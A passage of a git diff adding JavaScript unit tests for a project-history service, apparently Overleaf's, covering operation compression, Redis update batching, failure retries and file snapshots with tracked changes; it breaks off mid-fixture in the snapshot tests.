+++ b/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js
@@ -0,0 +1,76 @@
+import { expect } from 'chai'
+import Core from 'overleaf-editor-core'
+import * as OperationsCompressor from '../../../../app/js/OperationsCompressor.js'
+
+describe('OperationsCompressor', function () {
+ function edit(pathname, textOperationJsonObject) {
+ return Core.Operation.editFile(
+ pathname,
+ Core.TextOperation.fromJSON({ textOperation: textOperationJsonObject })
+ )
+ }
+
+ it('collapses edit operations', function () {
+ const compressedOperations = OperationsCompressor.compressOperations([
+ edit('main.tex', [3, 'foo', 17]),
+ edit('main.tex', [10, -5, 8]),
+ ])
+
+ expect(compressedOperations).to.have.length(1)
+ expect(compressedOperations[0]).to.deep.equal(
+ edit('main.tex', [3, 'foo', 4, -5, 8])
+ )
+ })
+
+ it('only collapses consecutive composable edit operations', function () {
+ const compressedOperations = OperationsCompressor.compressOperations([
+ edit('main.tex', [3, 'foo', 17]),
+ edit('main.tex', [10, -5, 8]),
+ edit('not-main.tex', [3, 'foo', 17]),
+ edit('not-main.tex', [10, -5, 8]),
+ ])
+
+ expect(compressedOperations).to.have.length(2)
+ expect(compressedOperations[0]).to.deep.equal(
+ edit('main.tex', [3, 'foo', 4, -5, 8])
+ )
+ expect(compressedOperations[1]).to.deep.equal(
+ edit('not-main.tex', [3, 'foo', 4, -5, 8])
+ )
+ })
+
+ it("doesn't collapse text operations around non-composable operations", function () {
+ const compressedOperations = OperationsCompressor.compressOperations([
+ edit('main.tex', [3, 'foo', 17]),
+ Core.Operation.moveFile('main.tex', 'new-main.tex'),
+ edit('new-main.tex', [10, -5, 8]),
+ edit('new-main.tex', [6, 'bar', 12]),
+ ])
+
+ expect(compressedOperations).to.have.length(3)
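+ // the moveFile in the middle is not composable with the text edits, so
+ // the edits on either side must stay separate
+ 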
expect(compressedOperations[0]).to.deep.equal(
+ edit('main.tex', [3, 'foo', 17])
+ )
+ expect(compressedOperations[1].newPathname).to.deep.equal('new-main.tex')
+ expect(compressedOperations[2]).to.deep.equal(
+ edit('new-main.tex', [6, 'bar', 4, -5, 8])
+ )
+ })
+
+ it('handles empty operations', function () {
+ const compressedOperations = OperationsCompressor.compressOperations([])
+
+ expect(compressedOperations).to.have.length(0)
+ })
+
+ it('handles single operations', function () {
+ const compressedOperations = OperationsCompressor.compressOperations([
+ edit('main.tex', [3, 'foo', 17]),
+ ])
+
+ expect(compressedOperations).to.have.length(1)
+ expect(compressedOperations[0]).to.deep.equal(
+ edit('main.tex', [3, 'foo', 17])
+ )
+ })
+})
diff --git a/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js b/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js
new file mode 100644
index 0000000..53f9378
--- /dev/null
+++ b/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js
@@ -0,0 +1,556 @@
+import { expect } from 'chai'
+import sinon from 'sinon'
+import { strict as esmock } from 'esmock'
+
+const MODULE_PATH = '../../../../app/js/RedisManager.js'
+
+describe('RedisManager', function () {
+ beforeEach(async function () {
+ this.rclient = new FakeRedis()
+ this.RedisWrapper = {
+ createClient: sinon.stub().returns(this.rclient),
+ }
+ this.Settings = {
+ redis: {
+ project_history: {
+ key_schema: {
+ projectHistoryOps({ project_id: projectId }) {
+ return `Project:HistoryOps:{${projectId}}`
+ },
+ projectHistoryFirstOpTimestamp({ project_id: projectId }) {
+ return `ProjectHistory:FirstOpTimestamp:{${projectId}}`
+ },
+ },
+ },
+ },
+ }
+
+ this.Metrics = {
+ timing: sinon.stub(),
+ summary: sinon.stub(),
+ globalGauge: sinon.stub(),
+ }
+ this.RedisManager = await esmock(MODULE_PATH, {
+ '@overleaf/redis-wrapper': this.RedisWrapper,
+ '@overleaf/settings': this.Settings,
+ '@overleaf/metrics': this.Metrics,
+ })
+
+ this.projectId = 'project-id-123'
+ this.batchSize = 100
+ this.historyOpsKey = `Project:HistoryOps:{${this.projectId}}`
+ this.firstOpTimestampKey = `ProjectHistory:FirstOpTimestamp:{${this.projectId}}`
+
+ this.updates = [
+ { v: 42, op: ['a', 'b', 'c', 'd'] },
+ { v: 45, op: ['e', 'f', 'g', 'h'] },
+ ]
+ this.extraUpdates = [{ v: 100, op: ['i', 'j', 'k'] }]
+ this.rawUpdates = this.updates.map(update => JSON.stringify(update))
+ this.extraRawUpdates = this.extraUpdates.map(update =>
+ JSON.stringify(update)
+ )
+ })
+
+ describe('getRawUpdatesBatch', function () {
+ it('gets a small number of updates in one batch', async function () {
+ const updates = makeUpdates(2)
+ const rawUpdates = makeRawUpdates(updates)
+ this.rclient.setList(this.historyOpsKey, rawUpdates)
+ const result = await this.RedisManager.promises.getRawUpdatesBatch(
+ this.projectId,
+ 100
+ )
+ expect(result).to.deep.equal({ rawUpdates, hasMore: false })
+ })
+
+ it('gets a larger number of updates in several batches', async function () {
+ const updates = makeUpdates(
+ this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2 + 12
+ )
+ const rawUpdates = makeRawUpdates(updates)
+ this.rclient.setList(this.historyOpsKey, rawUpdates)
+ const result = await this.RedisManager.promises.getRawUpdatesBatch(
+ this.projectId,
+ 5000
+ )
+ expect(result).to.deep.equal({ rawUpdates, hasMore: false })
+ })
+
+ it("doesn't return more than the number of updates requested", async function () {
+ const updates = makeUpdates(100)
+ const rawUpdates = 
makeRawUpdates(updates) + this.rclient.setList(this.historyOpsKey, rawUpdates) + const result = await this.RedisManager.promises.getRawUpdatesBatch( + this.projectId, + 75 + ) + expect(result).to.deep.equal({ + rawUpdates: rawUpdates.slice(0, 75), + hasMore: true, + }) + }) + }) + + describe('parseDocUpdates', function () { + it('should return the parsed ops', function () { + const updates = makeUpdates(12) + const rawUpdates = makeRawUpdates(updates) + this.RedisManager.parseDocUpdates(rawUpdates).should.deep.equal(updates) + }) + }) + + describe('getUpdatesInBatches', function () { + beforeEach(function () { + this.runner = sinon.stub().resolves() + }) + + describe('single batch smaller than batch size', function () { + beforeEach(async function () { + this.updates = makeUpdates(2) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 3, + this.runner + ) + }) + + it('calls the runner once', function () { + this.runner.callCount.should.equal(1) + }) + + it('calls the runner with the updates', function () { + this.runner.should.have.been.calledWith(this.updates) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + + it('deletes the first op timestamp', function () { + expect(this.rclient.del).to.have.been.calledWith( + this.firstOpTimestampKey + ) + }) + }) + + describe('single batch at batch size', function () { + beforeEach(async function () { + this.updates = makeUpdates(123) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner once', function () { + this.runner.callCount.should.equal(1) + }) + + it('calls the runner with the updates', function () { + this.runner.should.have.been.calledWith(this.updates) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + + it('deletes the first op timestamp', function () { + expect(this.rclient.del).to.have.been.calledWith( + this.firstOpTimestampKey + ) + }) + }) + + describe('single batch exceeding size limit on updates', function () { + beforeEach(async function () { + this.updates = makeUpdates(2, [ + 'x'.repeat(this.RedisManager.RAW_UPDATE_SIZE_THRESHOLD), + ]) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two batches with first update below and second update above the size limit on updates', function () { + beforeEach(async function () { + this.updates = makeUpdates(2, [ + 'x'.repeat(this.RedisManager.RAW_UPDATE_SIZE_THRESHOLD / 2), + ]) + this.rawUpdates = 
makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('single batch exceeding op count limit on updates', function () { + beforeEach(async function () { + const ops = Array(this.RedisManager.MAX_UPDATE_OP_LENGTH + 1).fill('op') + this.updates = makeUpdates(2, { op: ops }) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('single batch exceeding doc content count', function () { + beforeEach(async function () { + this.updates = makeUpdates( + this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT + 3, + { resyncDocContent: 123 } + ) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first batch of updates', function () { + this.runner.should.have.been.calledWith( + this.updates.slice(0, this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT) + ) + }) + + it('calls the runner with the second batch of updates', function () { + this.runner.should.have.been.calledWith( + this.updates.slice(this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT) + ) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two batches with first update below and second update above the ops length limit on updates', function () { + beforeEach(async function () { + // set the threshold below the size of the first update + this.updates = makeUpdates(2, { op: ['op1', 'op2'] }) + this.updates[1].op = Array( + this.RedisManager.MAX_UPDATE_OP_LENGTH + 2 + ).fill('op') + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner.should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the 
runner with the second update', function () {
+ this.runner.should.have.been.calledWith(this.updates.slice(1))
+ })
+
+ it('deletes the applied updates', function () {
+ expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([])
+ })
+ })
+
+ describe('two batches, one partial', function () {
+ beforeEach(async function () {
+ this.updates = makeUpdates(15)
+ this.rawUpdates = makeRawUpdates(this.updates)
+ this.rclient.setList(this.historyOpsKey, this.rawUpdates)
+ await this.RedisManager.promises.getUpdatesInBatches(
+ this.projectId,
+ 10,
+ this.runner
+ )
+ })
+
+ it('calls the runner twice', function () {
+ this.runner.callCount.should.equal(2)
+ })
+
+ it('calls the runner with the updates', function () {
+ this.runner
+ .getCall(0)
+ .should.have.been.calledWith(this.updates.slice(0, 10))
+ this.runner
+ .getCall(1)
+ .should.have.been.calledWith(this.updates.slice(10))
+ })
+
+ it('deletes the applied updates', function () {
+ expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([])
+ })
+ })
+
+ describe('two full batches', function () {
+ beforeEach(async function () {
+ this.updates = makeUpdates(20)
+ this.rawUpdates = makeRawUpdates(this.updates)
+ this.rclient.setList(this.historyOpsKey, this.rawUpdates)
+ await this.RedisManager.promises.getUpdatesInBatches(
+ this.projectId,
+ 10,
+ this.runner
+ )
+ })
+
+ it('calls the runner twice', function () {
+ this.runner.callCount.should.equal(2)
+ })
+
+ it('calls the runner with the updates', function () {
+ this.runner
+ .getCall(0)
+ .should.have.been.calledWith(this.updates.slice(0, 10))
+ this.runner
+ .getCall(1)
+ .should.have.been.calledWith(this.updates.slice(10))
+ })
+
+ it('deletes the applied updates', function () {
+ expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([])
+ })
+ })
+
+ describe('three full batches, bigger than the Redis read batch size', function () {
+ beforeEach(async function () {
+ this.batchSize = this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2
+ this.updates = makeUpdates(this.batchSize * 3)
+ this.rawUpdates = makeRawUpdates(this.updates)
+ this.rclient.setList(this.historyOpsKey, this.rawUpdates)
+ await this.RedisManager.promises.getUpdatesInBatches(
+ this.projectId,
+ this.batchSize,
+ this.runner
+ )
+ })
+
+ it('calls the runner three times', function () {
+ this.runner.callCount.should.equal(3)
+ })
+
+ it('calls the runner with the updates', function () {
+ this.runner
+ .getCall(0)
+ .should.have.been.calledWith(this.updates.slice(0, this.batchSize))
+ this.runner
+ .getCall(1)
+ .should.have.been.calledWith(
+ this.updates.slice(this.batchSize, this.batchSize * 2)
+ )
+ this.runner
+ .getCall(2)
+ .should.have.been.calledWith(this.updates.slice(this.batchSize * 2))
+ })
+
+ it('deletes the applied updates', function () {
+ expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([])
+ })
+ })
+
+ describe('error when first reading updates', function () {
+ beforeEach(async function () {
+ this.updates = makeUpdates(10)
+ this.rawUpdates = makeRawUpdates(this.updates)
+ this.rclient.setList(this.historyOpsKey, this.rawUpdates)
+ this.rclient.throwErrorOnLrangeCall(0)
+ await expect(
+ this.RedisManager.promises.getUpdatesInBatches(
+ this.projectId,
+ 2,
+ this.runner
+ )
+ ).to.be.rejected
+ })
+
+ it('does not delete any updates', function () {
+ expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal(
+ this.rawUpdates
+ )
+ })
+ })
+
+ describe('error when reading updates for a second batch', function () {
+ beforeEach(async function () {
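+ // use a batch size just under the Redis read size so the second
+ // (failing) LRANGE read happens after the first batch is processed
+ 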
this.batchSize = this.RedisManager.RAW_UPDATES_BATCH_SIZE - 1 + this.updates = makeUpdates(this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + this.rclient.throwErrorOnLrangeCall(1) + await expect( + this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + this.batchSize, + this.runner + ) + ).to.be.rejected + }) + + it('calls the runner with the first batch of updates', function () { + this.runner.should.have.been.calledOnce + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, this.batchSize)) + }) + + it('deletes only the first batch of applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal( + this.rawUpdates.slice(this.batchSize) + ) + }) + }) + }) +}) + +class FakeRedis { + constructor() { + this.data = new Map() + this.del = sinon.stub() + this.lrangeCallCount = -1 + } + + setList(key, list) { + this.data.set(key, list) + } + + getList(key) { + return this.data.get(key) + } + + throwErrorOnLrangeCall(callNum) { + this.lrangeCallThrowingError = callNum + } + + async lrange(key, start, stop) { + this.lrangeCallCount += 1 + if ( + this.lrangeCallThrowingError != null && + this.lrangeCallThrowingError === this.lrangeCallCount + ) { + throw new Error('LRANGE failed!') + } + const list = this.data.get(key) ?? [] + return list.slice(start, stop + 1) + } + + async lrem(key, count, elementToRemove) { + expect(count).to.be.greaterThan(0) + const original = this.data.get(key) ?? [] + const filtered = original.filter(element => { + if (count > 0 && element === elementToRemove) { + count-- + return false + } + return true + }) + this.data.set(key, filtered) + } + + async exec() { + // Nothing to do + } + + multi() { + return this + } +} + +function makeUpdates(updateCount, extraFields = {}) { + const updates = [] + for (let i = 0; i < updateCount; i++) { + updates.push({ v: i, ...extraFields }) + } + return updates +} + +function makeRawUpdates(updates) { + return updates.map(JSON.stringify) +} diff --git a/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js b/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js new file mode 100644 index 0000000..e8443aa --- /dev/null +++ b/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js @@ -0,0 +1,145 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/RetryManager.js' + +describe('RetryManager', function () { + beforeEach(async function () { + this.projectId1 = new ObjectId().toString() + this.projectId2 = new ObjectId().toString() + this.projectId3 = new ObjectId().toString() + this.projectId4 = new ObjectId().toString() + this.historyId = 12345 + + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub().resolves(this.historyId), + }, + } + this.RedisManager = { + promises: { + countUnprocessedUpdates: sinon.stub().resolves(0), + }, + } + this.ErrorRecorder = { + promises: { + getFailedProjects: sinon.stub().resolves([ + { + project_id: this.projectId1, + error: 'Error: Timeout', + attempts: 1, + }, + { + project_id: this.projectId2, + error: 'Error: Timeout', + attempts: 25, + }, + { + project_id: this.projectId3, + error: 'sync ongoing', + attempts: 10, + resyncAttempts: 1, + }, + { + project_id: this.projectId4, + error: 'sync ongoing', + 
attempts: 10, + resyncAttempts: 2, + }, + ]), + getFailureRecord: sinon.stub().resolves(), + }, + } + this.SyncManager = { + promises: { + startResync: sinon.stub().resolves(), + startHardResync: sinon.stub().resolves(), + }, + } + this.UpdatesProcessor = { + promises: { + processUpdatesForProject: sinon.stub().resolves(), + }, + } + this.settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + this.request = {} + this.RetryManager = await esmock(MODULE_PATH, { + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '@overleaf/settings': this.settings, + request: this.request, + }) + }) + + describe('RetryManager', function () { + describe('for a soft failure', function () { + beforeEach(async function () { + await this.RetryManager.promises.retryFailures({ failureType: 'soft' }) + }) + + it('should flush the queue', function () { + expect( + this.UpdatesProcessor.promises.processUpdatesForProject + ).to.have.been.calledWith(this.projectId1) + }) + }) + + describe('for a hard failure', function () { + beforeEach(async function () { + await this.RetryManager.promises.retryFailures({ failureType: 'hard' }) + }) + + it('should check the overleaf project id', function () { + expect( + this.WebApiManager.promises.getHistoryId + ).to.have.been.calledWith(this.projectId2) + }) + + it("should start a soft resync when a resync hasn't been tried yet", function () { + expect(this.SyncManager.promises.startResync).to.have.been.calledWith( + this.projectId2 + ) + }) + + it('should start a hard resync when a resync has already been tried', function () { + expect( + this.SyncManager.promises.startHardResync + ).to.have.been.calledWith(this.projectId3) + }) + + it("shouldn't try a resync after a hard resync attempt failed", function () { + expect( + this.SyncManager.promises.startHardResync + ).not.to.have.been.calledWith(this.projectId4) + }) + + it('should count the unprocessed updates', function () { + expect( + this.RedisManager.promises.countUnprocessedUpdates + ).to.have.been.calledWith(this.projectId2) + }) + + it('should check the failure record', function () { + expect( + this.ErrorRecorder.promises.getFailureRecord + ).to.have.been.calledWith(this.projectId2) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js b/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js new file mode 100644 index 0000000..d6c5205 --- /dev/null +++ b/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js @@ -0,0 +1,1103 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import Core from 'overleaf-editor-core' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/SnapshotManager.js' + +describe('SnapshotManager', function () { + beforeEach(async function () { + this.HistoryStoreManager = { + getBlobStore: sinon.stub(), + promises: { + getChunkAtVersion: sinon.stub(), + getMostRecentChunk: sinon.stub(), + getProjectBlobStream: sinon.stub(), + }, + } + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub(), + }, + } + this.SnapshotManager = await esmock(MODULE_PATH, 
{ + 'overleaf-editor-core': Core, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/Errors.js': Errors, + }) + this.projectId = 'project-id-123' + this.historyId = 'ol-project-id-123' + this.callback = sinon.stub() + }) + + describe('getFileSnapshotStream', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.ranges = { + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 6 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + }, + }, + ], + } + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'file_with_ranges.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + rangesHash: '73061952d41ce54825e2fc1c36b4cf736d5fb62f', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }, + }) + }) + + describe('of a text file with no tracked changes', function () { + beforeEach(async function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + )), + getObject: sinon.stub().rejects(), + }) + this.stream = await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'main.tex' + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.getString + .calledWith('35c9bd86574d61dcadbce2fdd3d4a0684272c6ea') + .should.equal(true) + }) + + it('should return a string stream with the text content', function () { + expect(this.stream.read().toString()).to.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + }) + + describe('on blob store error', function () { + beforeEach(function () { + this.error = new Error('ESOCKETTIMEDOUT') + this.HistoryStoreManager.getBlobStore + .withArgs(this.historyId) + .returns({ + getString: sinon.stub().rejects(this.error), + getObject: sinon.stub().rejects(this.error), + }) + }) + + it('should call back with error', async function () { + await expect( + this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'main.tex' + ) + ).to.be.rejectedWith(this.error) + }) + }) + }) + + describe('of a text file with tracked changes', function () { + beforeEach(async 
function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon + .stub() + .resolves('the quick brown fox jumps over the lazy dog')), + getObject: (this.getObject = sinon.stub().resolves(this.ranges)), + }) + this.stream = await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'file_with_ranges.tex' + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.getString + .calledWith('5d2781d78fa5a97b7bafa849fe933dfc9dc93eba') + .should.equal(true) + }) + + it('should get the blob of the ranges', function () { + this.getObject + .calledWith('73061952d41ce54825e2fc1c36b4cf736d5fb62f') + .should.equal(true) + }) + + it('should return a string stream with the text content without the tracked deletes', function () { + expect(this.stream.read().toString()).to.equal( + 'the brown fox jumps over the lazy dog' + ) + }) + }) + + describe('of a binary file', function () { + beforeEach(async function () { + this.HistoryStoreManager.promises.getProjectBlobStream + .withArgs(this.historyId) + .resolves((this.stream = 'mock-stream')) + this.returnedStream = + await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'binary.png' + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.HistoryStoreManager.promises.getProjectBlobStream + .calledWith( + this.historyId, + 'c6654ea913979e13e22022653d284444f284a172' + ) + .should.equal(true) + }) + + it('should return a stream with the blob content', function () { + expect(this.returnedStream).to.equal(this.stream) + }) + }) + + describe("when the file doesn't exist", function () { + it('should return a NotFoundError', async function () { + await expect( + this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'not-here.png' + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + }) + }) + + describe('getProjectSnapshot', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.ranges = { + comments: [], + trackedChanges: [ + { + range: { pos: 5, length: 6 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + }, + }, + { + range: { pos: 12, length: 5 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + }, + }, + ], + } + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'unchanged.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'with_ranges_unchanged.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + rangesHash: '2e59fe3dbd5310703f89236d589d0b35db169cdf', + stringLength: 41, + }, + 
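+ // Files that carry a rangesHash have a second blob (comments and tracked changes) alongside the content blob identified by hash.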
'with_ranges_changed.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + rangesHash: '2e59fe3dbd5310703f89236d589d0b35db169cdf', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'with_ranges_changed.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:25.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }) + }) + + describe('of project', function () { + beforeEach(async function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +` + )), + getObject: (this.getObject = sinon.stub().resolves(this.ranges)), + }) + this.data = await this.SnapshotManager.promises.getProjectSnapshot( + this.projectId, + 6 + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 6) + .should.equal(true) + }) + + it('should get the ranges for the file with tracked changes', function () { + expect(this.getObject).to.have.been.calledWith( + '2e59fe3dbd5310703f89236d589d0b35db169cdf' + ) + }) + + it('should produce the snapshot file data', function () { + expect(this.data).to.deep.equal({ + files: { + 'main.tex': { + // files with operations in the chunk should return content only + data: { + content: + 'Hello world\n\nOne two three\n\nFour five six\n\nSeven eight nine', + }, + }, + 'unchanged.tex': { + // unchanged files in the chunk should return hash only + data: { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + }, + }, + 'with_ranges_changed.tex': { + // files in the chunk with tracked changes should return content + // without the tracked deletes + data: { + content: + 'Hello\n\nOne two three\n\nFour five six\n\nSeven eight', + }, + }, + 'with_ranges_unchanged.tex': { + // files in the chunk with tracked changes should return content + // without the tracked deletes, even if they are unchanged + data: { + content: 'Hello\n\nOne two three\n\nFour five six', + }, + }, + 'binary.png': { + // binary files in the chunk should return hash only + data: { + hash: 